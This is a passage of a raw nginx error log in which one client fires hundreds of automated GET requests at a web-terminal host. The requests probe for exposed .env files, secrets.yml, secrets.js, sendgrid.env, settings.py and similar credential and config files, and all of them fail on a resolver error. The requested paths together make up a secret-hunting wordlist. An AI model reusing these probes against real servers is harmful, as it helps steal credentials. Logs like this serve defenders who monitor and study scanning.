185.177.72.56, server: terminal.profibot.hu, request: "GET /qv-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rabbitmq-cluster/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rails-api/react-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rails/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rasax/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /react_todo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /redmine/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /repo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /repos/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /repository/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/docker/mysql/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/docker/phpmyadmin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/docker/rabbitmq/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resources/docker/rediscommander/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /resourcesync/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rest.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /restapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /results/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /robots.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /robots/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rollup.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rosterBack/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /roundcube/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /roundcubemail/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /routes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /run/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rust-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /rust-backend/dao/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /s-with-me-front/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /s3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /saas/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /samples/chatroom/chatroom-spa/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /samples/docker/deploymentscripts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sapi/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /script/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/fvt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /secrets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /selfish-darling-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sendgrid.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /serve-browserbench/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Serve_time_server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server-status HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server/laravel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server/s3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server/src/persistence/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:03 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Server_with_db/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /serverless.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /service-worker.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/adminer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/deployment-agent/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/documents/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/graylog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/jaeger/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/minio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/monitoring/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/portainer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/redis-commander/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/registry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/simcore/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /services/traefik/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sessions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /shared/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /shibboleth/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /shop/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /shopware/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Simple_server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /site-library/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sitemaps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sites/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sitestatic/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Socketio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /source/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /sources/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Sources/API/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /spearmint/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /spikes/config-material-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /SpotiApps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/instanceWithDependentSteps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:04 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/typeScriptIntegrationProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/typeScriptProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/typeScriptVisualizeProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/add-auth/express/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/assembly/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/character-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/client/mobile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/core/tests/dotenv-files/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/gameprovider-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/main/front-end/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /src/renderer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /srv6_controller/controller/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /srv6_controller/examples/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /srv6_controller/node-manager/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /st-js-be-2020-movies-two/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /stack.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /stackato-pkg/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /stag/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staging/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static-collected/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static-html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static-root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/*.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.11bc02d8.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.1b34ee2a.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.335d17a0.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.36e5ec99.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.48389ac6.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.4aa2819f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.602cea98.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.87c766e3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:05 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.89c971fa.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.8c18b542.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.bfa51071.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static/js/main.ef8ecb99.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static_prod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /static_user/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /staticfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /stats/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/debugbar/*.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server 